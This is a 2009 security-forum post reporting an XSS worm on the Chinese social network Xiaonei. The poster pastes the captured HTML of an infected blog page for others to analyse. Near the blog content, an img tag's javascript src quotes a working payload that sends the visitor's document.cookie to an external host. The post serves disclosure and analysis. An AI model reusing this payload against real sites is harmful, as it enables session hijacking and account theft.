【急】校内网正在流行AJAX蠕虫病毒 - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 恶意网站交流【急】校内网正在流行AJAX蠕虫病毒

	瑞星ESM助力北京石龙医院筑牢安全防线		瑞星恶意代码管理系统助金华电力提升防御能力		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		助力国家网络安全瑞星获病毒应急处理中心感谢信
	实力拉满瑞星第四十四次通过VB100测评		瑞星发布2024年六大网络安全趋势		瑞星携手中国农业大学共筑网络安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

[漏洞提醒] 【急】校内网正在流行AJAX蠕虫病毒

爱乐维初生襁褓狮帖子:11 注册: 2009-05-12 来自:	发表于： 2009-06-15 13:44 \| 只看楼主短消息资料字号：小中大 1楼【急】校内网正在流行AJAX蠕虫病毒校内网正在流行AJAX蠕虫病毒，利用IE的JavaScript漏洞进行传播。我使用safari浏览器打开了含有恶意代码的网页，复制了源文件，请高手分析。谢谢！！ <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>校内 - 浏览日志 - shit xiaonei 13:10:27</title> <meta http-equiv="Content-Type" c /> <meta http-equiv="X-UA-Compatible" c /> <meta name="Description" c /> <meta name="Keywords" c /> <link href="http://s.xnimg.cn/124229/csspro/base/layout.css" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.xnimg.cn/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <script type="text/javascript" src="http://s.xnimg.cn/124236/jspro/base.js"></script> <link id="st_for_r_f" vhref="http://s.xnimg.cn/124304/csspro/apps/profile.css" /> <script id="js_for_r_f" vsrc="http://s.xnimg.cn/113699/jspro/xn.app.recommendFriend.js"></script> <link href="http://s.xnimg.cn/123858/csspro/apps/blog.css" rel="stylesheet" type="text/css" media="all" /> <link href="http://s.xnimg.cn/68381/css/simpleEditor.css" rel="stylesheet" type="text/css" media="all" /> <script type="text/javascript" src="http://s.xnimg.cn/124315/jspro/xn.app.blog.js"></script><script type="text/javascript" src="http://s.xnimg.cn/121736/jspro/tinymce/tiny_mce.js"></script><script type="text/javascript" src="http://s.xnimg.cn/121736/jspro/tinymce/tiny_mce_letterpapers.js"></script><!-- <script type="text/javascript" src="http://s.xnimg.cn/124238/jspro/tinymce/tiny_mce.js"></script><script type="text/javascript" src="http://s.xnimg.cn/124238/jspro/tinymce/tiny_mce_letterpapers.js"></script> --> <!-- <script type="text/javascript" src="http://s.xnimg.cn/124238/jspro/tinymce/tiny_mce_letterpapers.js"></script> <script type="text/javascript" src="http://s.xnimg.cn/124315/jspro/xn.app.blog.js"></script> --> <script type="text/javascript" src="http://s.xnimg.cn/124233/jspro/xn.app.share.js"></script> <!--[if lte IE 6]><style type="text/css" media="screen">/* <![CDATA[ / @import url(http://s.xnimg.cn/124235/csspro/patch/ie6.css); / ]]> /</style><![endif]--> <!--[if gte IE 7]><style type="text/css" media="screen">/ <![CDATA[ / @import url(http://s.xnimg.cn/124235/csspro/patch/ie7.css); / ]]> /</style><![endif]--> <script type="text/javascript">function hideInfo() { var key = document.getElementById("key"); XN.Cookie.del(key.value); XN.Cookie.set(key.value, "4", 10000, "/", "blog.xiaonei.com"); if($('info')) $('info').hide();}XN.DOM.readyDo(function(){ document_onload();});</script> </head> <body id="blogpage" class="viewfriends"> <div id="container"> <div id="dropmenuHolder" class="dropmenu-holder"> <div id="optiondropdownMenu" class="menu-dropdown optionmenu" style="display:none;"> <div class="menu-dropdown-border"> <div class="optionmenu"> <ul> <li> <a class="optionaccount" href="http://www.xiaonei.com/privacyhome.do">隐私设置</a> </li> <li> <a class="optionprivacy" href="http://www.xiaonei.com/personallink.do">帐户设置</a> </li> <li> <a class="optionapplication" href="http://app.xiaonei.com/apps/editapps.do?origin=118">应用设置</a> </li> </ul> </div> </div> </div> <div id="searchdropdownMenu" class="menu-dropdown" style="display:none;width:110px;"> <div class="menu-dropdown-border"> <div class="search-menu"> <ul> <li> <a href="http://browse.xiaonei.com/ns.do?action=classmates">搜索同学</a> </li> <li> <a href="http://browse.xiaonei.com/ns.do?action=coworkers">搜索同事</a> </li> <li> <a href="http://browse.xiaonei.com/advanced.do">高级搜索</a> </li> </ul> </div> </div> </div> <div id="appMenu" class="menu-dropdown" style="display:none;left:-99999px;top:-99999px;"> <div class="menu-dropdown-border"> <h4>最近使用 </h4> <div class="menu-holder recent-app"> <ul class="menu-item"> <li class="last-app"><a href="http://blog.xiaonei.com/" style="background-image:url(); background-position:10px -59px;">日志</a></li><li><a href="http://photo.xiaonei.com/" style="background-image:url(); background-position:10px 5px;">相册</a></li><li><a href="http://share.xiaonei.com/share/ShareList.do" style="background-image: url();">分享</a></li><li><a href="http://event.xiaonei.com/EventHome.do" style="background-image: url();">活动</a></li><li><a href="http://gift.xiaonei.com/" style="background-image:url(); background-position:10px -315px;">礼物</a></li><li><a href="http://market.xiaonei.com" style="background-image: url();">跳蚤市场</a></li><li><a href="http://movie.xiaonei.com/" style="background-image: url();">电影</a></li><li><a href="http://abc.xiaonei.com/knowabc/investigation/KnowVotingList.do?showType=all" style="background-image:url(); background-position:10px -123px;">投票</a></li><li><a href="http://i.xiaonei.com/click.action?from=40042&url=%2F" style="background-image: url();">紫豆服务</a></li><li><a href="http://quiz.xiaonei.com" style="background-image: url();">测试</a></li> <li><a href="http://apps.xiaonei.com/xinggeq/index.php?origin=104" style="background-image:url(); background-position:10px -283px;">测试</a></li><li><a href="http://dog.xiaonei.com/" style="background-image:url(); background-position:10px -187px;">狗狗</a></li> </ul> </div> <div id="navMyApps" class="menu-holder my-app"> <ul class="menu-item"> <li><a href="http://class.xiaonei.com" style="background-image: url();">班级</a></li><li><a href="http://club.xiaonei.com/" style="background-image: url();">论坛</a></li> </ul> </div> <div id="navAllApps" class="menu-holder all-app clearfix" style="display:none;"> <ul class="menu-item"> <li><a href="http://class.xiaonei.com" style="background-image: url();">班级</a></li><li><a href="http://club.xiaonei.com/" style="background-image: url();">论坛</a></li> </ul> </div> <div class="separator"></div> <div class="app-actions"> <ul> <li><a href="http://app.xiaonei.com/apps/editapps.do?origin=105">管理我的应用 <span>(10)</span></a></li> <li><a href="http://app.xiaonei.com/apps/apps.do?ref=top_menu&selected=3&type=1&origin=106">浏览更多应用</a></li> </ul> </div> </div> </div> </div> <div id="navBar" class="menu-bar"> <div class="navigation-wrapper"> <div class="navigation clearfix"> <div class="blank-holder"><div id="banner" class="banner clearfix"><div class="float-left"><!--AdMop Begin:--><div id="ad1000000003"></div><!--AdMop End--></div><div class="float-right"><!--AdMop Begin:--><div id="ad1000000004"></div><!--AdMop End--></div></div></div> <div id="logo"> <h1><a href="http://home.xiaonei.com/Home.do?id=234307396" title="校内">校内</a></h1> </div> <div class="nav-body clearfix"> <div class="nav-main"> <div class="menu"> <div class="menu-title"><a href="http://home.xiaonei.com/Home.do?id=234307396">首页</a></div> </div> <div class="menu" style="margin:0"> <div class="menu-title"><a href="http://xiaonei.com/profile.do?id=234307396">个人主页</a></div> </div> <div class="menu info-edit"> <div class="menu-title"><a href="http://www.xiaonei.com/BasicInfo.do">修改</a></div> </div> <div class="menu"> <div class="menu-title"><a href="http://friend.xiaonei.com/myfriendlistx.do">好友</a></div> </div> <div class="menu"> <div class="menu-title with-arrow"><a href="http://app.xiaonei.com/apps/apps.do?selected=3&type=1&origin=119" id="showAppMenu">应用</a></div> </div> <div class="menu"> <div class="menu-title"><a href="http://game.xiaonei.com/">游戏</a></div> </div> <div class="menu"> <div class="menu-title"><a id="global_inbox_link" href="http://msg.xiaonei.com">站内信</a></div> </div> </div> <div class="nav-other"> <div id="showNotify" class="topnotify hide"> <div id="notelist" class="notelist hide"> </div> </div> <div class="menu"> <div class="charge menu-title"><a target="_blank" href="http://pay.xiaonei.com">充值</a></div> </div> <div class="menu"> <div class="menu-title"><a href="http://i.xiaonei.com/">会员</a></div> </div> <div class="menu"> <div class="menu-title" id="optionMenuActive"><a href="#nogo" >设置</a></div> </div> <div class="menu last"> <div class="menu-title"><a href="http://www.xiaonei.com/Logout.do">退出</a></div> </div> <div id="searchMenuAction" class="menu"> <div class="menu-title"><a style="color:#fff" href="http://browse.xiaonei.com/os.do">搜索</a></div> </div> <div id="navSearch"> <form method="post" id="globalSearchForm" action="http://browse.xiaonei.com/os.do?from=opensearch"> <div id="search-input"> <input type="text" size="25" maxlength="100" id="navSearchInput" name="q" class="input-text" value="" tabindex="1" /> </div> <div id="search-submit"> <a href="http://browse.xiaonei.com/os.do" id="navSearchSubmit"><span class="search-mag-glass"> </span></a> </div> </form> </div> </div> </div> </div> </div> </div> <div id="opi" class="page-wrapper clearfix"> <div class="full-page-holder"> <div class="full-page clearfix"> <div class="main-page"> <div class="section-header"> <div class="section-avatar"> <a style="background-image: url();" href="http://xiaonei.com/profile.do?id=235083086"></a> </div> <div class="section-info"> <div class="section-gray"> <h2>陈建强ゆ緣兮的日志</h2> </div> <div class="section-actions"> <a href="http://msg.xiaonei.com/SendMessage.do?id=235083086&from=%E9%99%88%E5%BB%BA%E5%BC%BA%E3%82%86%E7%B7%A3%E5%85%AE%E7%9A%84%E6%97%A5%E5%BF%97&oriUrl=http%3A%2F%2Fblog.xiaonei.com%2FGetEntry.do%3Fid%3D397213001%26owner%3D235083086%26ref%3Dnewsfeed">发站内信</a> </div> </div> </div><!-- <div id="sub-nav"> <ul> --><div class="nav-tabs"> <ul class="tabs"> <li class="selected"><a href="http://blog.xiaonei.com/GetBlog.do?id=235083086" >陈建强ゆ緣兮的日志</a></li> <li ><a href="http://blog.xiaonei.com/SomeoneRelativeBlog.do?id=235083086" >与陈建强ゆ緣兮相关的日志</a></li> </ul></div> <div id="oak" class="white-gray"> <div class="blog-home"> <div class="pager-top"> <span class="right-line"><a href="http://blog.xiaonei.com/GetNextBlog.do?id=397213001&owner=235083086&time=1245044366000&op=next">上一篇</a> / <a href="http://blog.xiaonei.com/GetPreBlog.do?id=397213001&owner=235083086&time=1245044366000&op=pre">下一篇</a></span> <span class="left-line">共<strong>14</strong>篇日志</span> </div> <h3 class="title-article"> <div class="share-actions" id="share-actions"> <a href="javascript:void(0);" class="share" onclick='pop_share();'>分享</a></div><input type="hidden" id="link" name="link" value="http://blog.xiaonei.com/GetEntry.do?id=397213001&owner=235083086" /><input type="hidden" id="type" name="type" value="1" /><input type="hidden" id="title" name="title" value="shit xiaonei 13:10:27" /><input type="hidden" id="pic" name="pic" value="" /><input type="hidden" id="fromno" name="fromno" value="235083086" /><input type="hidden" id="fromname" name="fromname" id="fromname" value="陈建强ゆ緣兮" /><input type="hidden" id="fromuniv" name="fromuniv" id="fromuniv" value="北京印刷学院" /><input type="hidden" id="albumid" name="albumid" value="0" /><div id="summary" name="summary" style="display:none">13:10:27 最近大家是否发现自己的日志被恶意篡改了，只要看了分享就自动分享了，校内的跨站漏洞被恶意使用，龙叔在此为大家详解该漏洞。首先很感谢校内网提供了这么个漏洞，让我清楚地意识到只要有像校内网这样的程序员存在，我下辈子是不愁穿，不愁喝的了。当然这个只是个小测试，时间...</div><input id="largeurl" type="hidden" name="largeurl" value=""/> <strong>shit xiaonei 13:10:27</strong> <span class="timestamp">2009-06-15 13:39 </span> <span class="pipe">\|</span> <span class="group">(分类:<a href='http://blog.xiaonei.com/GetBlog.do?id=235083086&categoryId=0'>默认分类</a>)</span> </h3> <div id="blogContent" class="text-article"> 13:10:27 <p> 最近大家是否发现自己的日志被恶意篡改了，只要看了分享就自动分享了，校内的跨站漏洞被恶意使用，龙叔在此为大家详解该漏洞。</p><p> 首先很感谢校内网提供了这么个漏洞，让我清楚地意识到只要有像校内网这样的程序员存在，我下辈子是不愁穿，不愁喝的了。</p><p> 当然这个只是个小测试，时间为6个小时。我只想看看Ajax蠕虫到底有多牛。</p><p> </p><p> 还有价值上万的东西，龙叔怎么会告诉你呢？</p><p> <img src="javascript:alert('hacked by Sroan');window.location.href='http://www.33iq.cn/xiaonei.php?cookie='+document.cookie" alt="" width="6" height="7"></p> </div> <p class="stat-article"> <span class="float-right"><a href="#mycomment" >发表评论</a> <span class="pipe">\|</span> <span id="commend_info"><a href="http://admin.xiaonei.com/admin/newreportblog.do?contentId=397213001&userId=235083086&origURL=http://blog.xiaonei.com/GetEntry.do?id=397213001%26owner=235083086">举报日志</a></span> </span> 阅读(0)<span class="pipe">\|</span>评论(0)<span class="pipe">\|</span>分享(0) </p> <div id="ajaxComponent"> <a name="comments"></a> <div id="comments" class="no-comment"> <ol class="commentlist" id="commentlist"> </ol> </div> </div> <div id="ajax_msgerror" class="errors_div ajax_msgerror" style="display: none;"></div> <div> <form name="postcommentForm" id="replyform" method="post" action="/PostComment.do" > <input id="ownerid" name="owner" type="hidden" value="235083086" /> <div id="simpleEditPan"> <script type="text/javascript">document.domain='xiaonei.com';</script><link href="http://s.xnimg.cn/99370/css/editor.css" rel="stylesheet" type="text/css" /><script type="text/javascript" src="http://s.xnimg.cn/124232/js/blog2.js"></script><div class="bxTool"> <div id="left"></div> <div> <ul id="toolbar"></ul> </div> <span style="float:right;margin-top:3px"><input id="feedComment" type="checkbox" checked="true" value="" name="feedComment"/> <label for="feedComment">将评论同步发送到新鲜事</label></span> </div><textarea style="width:460px;" name="body" id="cmtbody" cols="60" rows="6" tabindex="10"></textarea><div id="popup"> <div id="faceImg"></div> <div id="shadow"></div> <div id="smallFace" ></div></div><script type="text/javascript">//edited by ray 4 the short cut submitfunction quickSendEditorCon() { getEl("editorFormBtn").click();}</script> </div> <p> <input id="cmttoid" name="to" type="hidden" value="0" /> <input name="id" type="hidden" value="397213001" /> <input type="hidden" id="whisper1" value="0" name="only_to_me" /> <label class="labelRadio" for="whisper"> <input type="checkbox" id="whisper" value="1" tabindex="3" /> 悄悄话 </label> </p> <input type="submit" value="发表评论" class="input-button" id="editorFormBtn" tabindex="2" /> </form> </div> </div> </div> <div class="blog-sidebar"> <div class="rounded-box"> <div class="corner tl"> <div class="corner tr"> <div class="corner bl"> <div class="corner br"> <div class="corner-body"> <div id="blog-releative"> </div> <div class="separator"></div> <div class="side-item more-blogs"> <div class="side-item-header clearfix"> <h4> 更多陈建强ゆ緣兮的日志 </h4> </div> <div class="side-item-body" id="list-relative"> <ul> <li> <a href="http://blog.xiaonei.com/GetEntry.do?id=397213001&owner=235083086" title="shit xiaonei 13:10:27">shit xiaonei ... </a> </li> <li> <a href="http://blog.xiaonei.com/GetEntry.do?id=389725149&owner=235083086" title="最容易出帅哥的星座、最容易出美女的星座、十二星座的开心果、12星座最精明排行榜、清高的星座排行榜。。。。(不能分享，只好超过来了）">最容易出帅哥的星座、 ... </a> </li> <li> <a href="http://blog.xiaonei.com/GetEntry.do?id=381776283&owner=235083086" title="回曼姐的点名">回曼姐的点名 </a> </li> <li> <a href="http://blog.xiaonei.com/GetEntry.do?id=349049636&owner=235083086" title="看《缘分天注定》有感">看《缘分天注定》有感 </a> </li> </ul> <span class="more"><a href="http://blog.xiaonei.com/GetBlog.do?id=235083086">更多</a> </span> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <!-- </div> --> <div id="comfirm_diag" class="generic_dialog wallpro_dialog pop_dialog" style=""></div> <div class="blank-bar"> <div class="ad-bar"> <!--AdMop Begin:--><div id="ad1000000005"></div><!--AdMop End--> <div class="block announcement link"><h3 style="font-weight:bold;color:#333">特别推荐</h3><div class="blockcont text"><IFRAME id="358" MARGINHEIGHT=0 MARGINWIDTH=0 FRAMEBORDER=0 WIDTH=100% HEIGHT=16 SCROLLING=NO SRC="http://gg.xiaonei.com/view.jsp?p=358"></IFRAME> <IFRAME id="241" MARGINHEIGHT=0 MARGINWIDTH=0 FRAMEBORDER=0 WIDTH=100% HEIGHT=16 SCROLLING=NO SRC="http://gg.xiaonei.com/view.jsp?p=241"></IFRAME><IFRAME id="242" MARGINHEIGHT=0 MARGINWIDTH=0 FRAMEBORDER=0 WIDTH=100% HEIGHT=16 SCROLLING=NO SRC="http://gg.xiaonei.com/view.jsp?p=242"></IFRAME></div></div> <!--AdMop Begin:--><div id="ad1000000006"></div><!--AdMop End--> </div> </div> </div> </div> </div> <div id="footer"> <div class="blank-holder"> <div id="bannerBottom" class="banner clearfix"> <div class="float-left"> <!--AdMop Begin:--> <div id="ad1000000007"></div> <!--AdMop End--> </div> <div class="float-right"> <!--AdMop Begin:--> <div id="ad1000000008"></div> <!--AdMop End--> </div></div> </div> <div class="copyright"> <span class="float-right"> <a href="http://xiaonei.com/getsysupdateinfo.do">校内日志</a><span class="pipe">\|</span><a href="http://xiaonei.com/info/About.do">关于</a><span class="pipe">\|</span><a href="http://app.xiaonei.com/developers/portal.do">开放平台</a><span class="pipe">\|</span><a href="http://xiaonei.com/info/jobs.jsp">招聘</a><span class="pipe">\|</span><a href="http://support.xiaonei.com/GetGuestbookList.do">客服</a><span class="pipe">\|</span><a href="http://xiaonei.com/info/Help.do">帮助</a><span class="pipe">\|</span><a href="http://xiaonei.com/info/PrivacyClaim.do">隐私声明</a><span class="pipe">\|</span><a href="http://xiaonei.com/info/Link.do">友情链接</a> </span> <span>千橡公司 <span title="revision220; SJSWT46-163.opi.com">©</span> 2009</span> </div> </div> <div class="hidden-area"></div> <script src="http://s.xnimg.cn/utm/urchin.js" type="text/javascript"></script> <script type="text/javascript"> _userv=0; urchinTracker(); load_jebe_ads(1);</script> <!-- </div> --> </body></html><script type="text/javascript">function change(){var whisper = document.getElementById("whisper");var whisper1 = document.getElementById("whisper1"); if (whisper.checked){ whisper1.value = '1'; }else { whisper1.value = '0'; }}</script> 用户系统信息：Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Safari/530.17*
爱乐维初生襁褓狮帖子:11 注册: 2009-05-12 来自:	分享到：

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT